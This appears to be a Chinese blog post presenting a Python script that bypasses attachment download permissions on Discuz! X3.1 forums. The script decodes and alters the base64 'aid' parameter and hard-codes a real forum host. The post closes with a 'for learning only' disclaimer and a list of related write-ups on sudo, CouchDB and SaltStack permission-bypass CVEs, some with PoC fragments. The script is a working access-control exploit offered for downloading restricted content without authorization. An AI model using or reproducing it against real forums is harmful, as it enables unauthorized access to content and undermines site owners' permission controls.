Python 实现 Discuz论坛附件下载权限绕过漏洞
背景:最近压力有些大,想玩点游戏放松下,去Mac论坛下载,发现需要各种权限,于是蛋疼了。
所以,上网查了discuz! x3.1破解,手动替换,发现出现“链接已过期”。所以写了下面程序。
0.将下列代码复制到你的python IDE中。
1.先进网页,chrome浏览器查看网页元素,替换正则表达式内内容。
2.刷新你要下载的页面,右键复制下载链接 url = ‘你复制的链接’
3.运行python,你的IDE里面就会打印出真实下载地址。
运行环境:python3.5
操作系统:macpro 2016
import base64
import re # 这里是你鼠标单击右键-》保存要下载的链接。替换 url = '你复制下来的链接'
# 其中"第一部分"是'.forum.php?mod=attachment&aid=' "第二部分"是 forum.php?mod=attachment&aid=
# 后面会用到
url = 'forum.php?mod=attachment&aid=NjE4NzF8NmM2ZDU4Y2Z8MTQ5ODgzNjUyMnwwfDIyMTg3' # url0是你要下载的网址的主页,加上"第二部分" 也就是 "forum.php?mod=attachment&aid="
url0 = 'http://m.tracker.7do.net/forum.php?mod=attachment&aid=' # 正则表达,需要将括号内的"第一部分" 也就是 "forum.php\?mod=attachment&aid=" 替换成你复制链接的第一部分
p = r'(forum.php\?mod=attachment&aid=)(.+)'
aid = re.search(p, url).group(2)
z = base64.b64decode(aid) #下面的正则不用管
# print(z)
p = r"(b')(.+)(')"
z1 = re.search(p, str(z)).group(2)
# print(z1)
p = r"(.+)(\|0\|)(.+)"
z2 = re.search(p,str(z1)).group(1)
p = r"(.+)(\|0\|)(.+)"
z3 = re.search(p,str(z1)).group(3)
# print(z2)
k = z2 + '|2|' + z3
k = bytes(k, encoding = "utf8")
# print(k)
# k = b'61871|acf3aa27|1498835323|1|22187'
j = base64.b64encode(k)
# print(j)
p = r"(b')(.+)(')"
j1 = re.search(p, str(j)).group(2)
# print(j1) url1 = url0 + j1
print(url1)
备注:上面破解仅供学习使用,不要用在其他用途,如果侵权,请联系作者,也就是我,我会妥当处理。
不明白过程的,可以看下面的参考资料。
参考资料:
Python 实现 Discuz论坛附件下载权限绕过漏洞的更多相关文章
- linux sudo root 权限绕过漏洞(CVE-2019-14287)
0x01 逛圈子社区论坛 看到了 linux sudo root 权限绕过漏洞(CVE-2019-14287) 跟着复现下 综合来说 这个漏洞作用不大 需要以下几个前提条件 1.知道当前普通用户的密 ...
- Android电话拨打权限绕过漏洞(CVE-2013-6272)分析
原文:http://blogs.360.cn/360mobile/2014/07/08/cve-2013-6272/ 1. CVE-2013-6272漏洞背景 CVE-2013-6272是一个安卓平台 ...
- Couchdb 垂直权限绕过漏洞(CVE-2017-12635)漏洞复现
couchdb简介: Apache CouchDB是一个开源的NoSQL数据库,专注于易用性和成为“完全拥抱web的数据库”.它是一个使用JSON作为数据存储格式,javascript作为查询语言,M ...
- CVE-2017-12635(Couchdb垂直权限绕过漏洞)
简介 Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库".它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapRedu ...
- Confluence实现附件下载权限的控制
背景: 公司为了方便的管理过程文档,搭建了一个Confluence服务器,版本6.9.在使用过程中,需要按照用户对空间中上传的附件进行下载权限控制. 解决过程及处理方案: 一.Confluence中导 ...
- broadAnywhere:Broadcast组件权限绕过漏洞(Bug: 17356824)
原创内容,转载请注明出处 http://retme.net/index.php/2014/11/14/broadAnywhere-bug-17356824.html Lolipop源代码已经放出有些日 ...
- PJzhang:CVE-2019-14287 sudo权限绕过漏洞复现
猫宁!!! 参考链接:Ms08067实验室公众号 sudo 1.8.28版本之前有漏洞. 更新完kali linux,deepin截图工具失效,只能用自带的,不能划重点. 看一下sudo版本,1.8. ...
- SaltStack 水平权限绕过漏洞(CVE-2020-11651)
影响版本 SaltStack < 2019.2.4 SaltStack < 3000.2 poc git clone https://github.com/jasperla/CVE-202 ...
- Couchdb 垂直权限绕过漏洞(CVE-2017-12635)
影响版本:小于 1.7.0 以及 小于 2.1.1 首先,发送如下数据包: 修改数据包 { "type": "user", "name": ...
随机推荐
- Java学习笔记——设计模式之三.装饰模式
函数应该做一件事,做好这件事,只做这一件事. --Clean Code 装饰模式,上代码: 先定义零件类: package cn.no3.decorator.template; public abst ...
- CNPM 遇到use strict的问题
一.问题描述 [root@VM_123_144_centos node01]# cnpm install --save nodemailer /usr/lib/node_modules/cnpm/no ...
- Kotlin学习第一课:从对比Java开始
1. 介绍 今年初,甲骨文再次对谷歌所谓的安卓侵权使用Java提起诉讼,要求后者赔偿高达90亿美元.随后便传出谷歌因此计划将主力语言切换到苹果主导的Swift,不过这事后来没了跟进. 但谷歌在这两天的 ...
- html学习笔记 - table表格
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8&quo ...
- Java反射机制剖析(一)-定义和API
1. 什么是Java反射机制 Java的反射机制是在程序运行时,能够完全知道任何一个类,及其它的属性和方法,并且能够任意调用一个对象的属性和方法.这种运行时的动态获取就是Java的反射机制.其 ...
- Openstack虚拟机在线迁移(Live Migration)
Openstack VM live migration can have 3 categories: -Block live migration without shared storage -Sha ...
- Customer segmentation – LifeCycle Grids with R(转)
I want to share a very powerful approach for customer segmentation in this post. It is based on cust ...
- 读Zepto源码之操作DOM
这篇依然是跟 dom 相关的方法,侧重点是操作 dom 的方法. 读Zepto源码系列文章已经放到了github上,欢迎star: reading-zepto 源码版本 本文阅读的源码为 zepto1 ...
- MYSQL和JAVA(课堂笔记)
MYSQL 数据库管理工具 JAVA 编程语言 数据库驱动(JAVA和MYSQL对接方式) 到官网上下载驱动 加载驱动 import java.sql.Connection;import java. ...
- springmvc 添加@ResponseBody
1.添加ResponseBody之后的话 返回字符串的时候 就是一个字符串. @RequestMapping(value = "/{bookId}/detail.do",metho ...